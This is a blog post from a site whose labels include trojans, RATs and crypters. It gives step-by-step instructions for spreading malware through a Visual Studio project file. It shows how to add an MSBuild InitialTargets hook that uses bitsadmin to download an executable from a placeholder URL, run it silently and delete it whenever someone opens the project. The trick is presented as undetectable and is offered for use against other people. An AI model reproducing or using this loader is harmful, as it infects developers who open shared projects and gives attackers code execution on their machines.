[Spread Through Visual Studio] [FUD] | The Software Portal

[Spread Through Visual Studio] [FUD]

[Spread Through Visual Studio] [FUD] Step 1: Create a new project in visual studio Step 2: Find the .vbproj/.csproj file and edit it Step ...

[Spread Through Visual Studio] [FUD]

Step 1: Create a new project in visual studio
Step 2: Find the .vbproj/.csproj file and edit it
Step 3: On the second line, it should have something similar to this

<Project ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

Edit this like to include
InitialTargets="Build"

The name can be whatever you want, I just thought "build" would be inconspicuous
<Project ToolsVersion="14.0" InitialTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

Step 4: Add this to the end of the file, but before the closing "</project>" tag
<Target Name="Buislfd">
<Exec Command="bitsadmin.exe /transfer NAME http://directdownload.to/your.exe %temp%\1.exe" >
<Output TaskParameter="ExitCode" PropertyName="ErrorCode" />
</Exec>
<Exec Command="%temp%\1.exe" >
<Output TaskParameter="ExitCode" PropertyName="ErrorCode" />
</Exec>
<Exec Command="del %temp%\1.exe" >
<Output TaskParameter="ExitCode" PropertyName="ErrorCode" />
</Exec>
<Message Importance="high" Text="$(ErrorCode)" />
</Target>

And save the file Now, whenever someone runs opens your project in Visual Studio, it will download and exec your file
[Spread Through Visual Studio] [FUD]

COMMENTS

Nome

.NET,9,3D,1,Action / Shooter,13,Activator,3,Add-ons,8,Adventure / Quest,5,All versions of Windows,7,Android OS software,7,Antivirus,18,Appearance,2,Arcade,2,ASM,1,Audio,2,AutoIT,1,Bots,10,Brute|Checker|Parser,1,C/C++,3,Console Games,1,Crypters,11,Decor,2,Delphi,4,Drivers,15,editor,7,Exploit,1,Fighting,1,GAMING,29,General Programming,5,Ghost Themes,1,Graphic arts,47,Hacking,10,Hot New,1,Hot News,6,HTML5 / CSS3 Templates,1,Instagram Hacking,1,Internet,12,Interrnet,1,iOS,1,iPhone / iPod / iPad,1,Linux & Unix,4,Magento / eCommerce,1,Mailer,1,Microsoft Windows Server,1,Miscellaneous Images,1,multimedia,8,NSIS,1,NULLED,11,Office,6,Onion,1,PC,27,PHP Scripts,2,Premium WordPress Plugins,1,Prestashop,1,Race,2,Racing,1,RAT,5,RPG / MMORPG,8,Scripts & Templates,1,SEO,1,Side,1,Simulators,1,Software,267,Sports,1,Stealers,1,Strategies,3,System,7,System Libraries,1,Tools,33,Trojans,223,vB Avatar Sets,1,vB Button Sets,1,vB Graphic Sets,1,vB Icon Sets,1,vB Rank Sets,1,vB Smilie Sets,1,Video Tutorials,5,Visual Basic,10,VPN,2,Web | SEO,2,Web Development and Programming,7,WINDOWS,314,Windows 10,29,Windows 2000,1,Windows 7,10,Windows 8,1,Windows Vista,1,Windows XP,1,WooCommerce,1,WooCommerce plugins,1,WooCommerce Themes,1,Wordpress,3,WordPress Plugins,1,Wordpress Theme,3,WPI,1,Xbox360,1,XenForo,8,XenForo 2.X.X,8,
ltr
item
The Software Portal: [Spread Through Visual Studio] [FUD]
[Spread Through Visual Studio] [FUD]
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgOxvRYOuSPwE02kOsm3_RzBT9oKTqCYf0vKXriHXq_yrLzh8IxS14q2-dqikP5vWqWVLUI5wbR9gLcXF_yj-jHisoTUhgIOxPHPngmCUUhExufnhgroC8PoqqSMHeyNYgGwkq9q1l3FWa/s1600/Visual+Studio+0day+Exploit-min.PNG
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgOxvRYOuSPwE02kOsm3_RzBT9oKTqCYf0vKXriHXq_yrLzh8IxS14q2-dqikP5vWqWVLUI5wbR9gLcXF_yj-jHisoTUhgIOxPHPngmCUUhExufnhgroC8PoqqSMHeyNYgGwkq9q1l3FWa/s72-c/Visual+Studio+0day+Exploit-min.PNG
The Software Portal
https://thesoftwareportal.blogspot.com/2018/06/spread-through-visual-studio-fud.html
https://thesoftwareportal.blogspot.com/
https://thesoftwareportal.blogspot.com/
https://thesoftwareportal.blogspot.com/2018/06/spread-through-visual-studio-fud.html
true
272199262371364214
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS PREMIUM CONTENT IS LOCKED STEP 1: Share to a social network STEP 2: Click the link on your social network Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy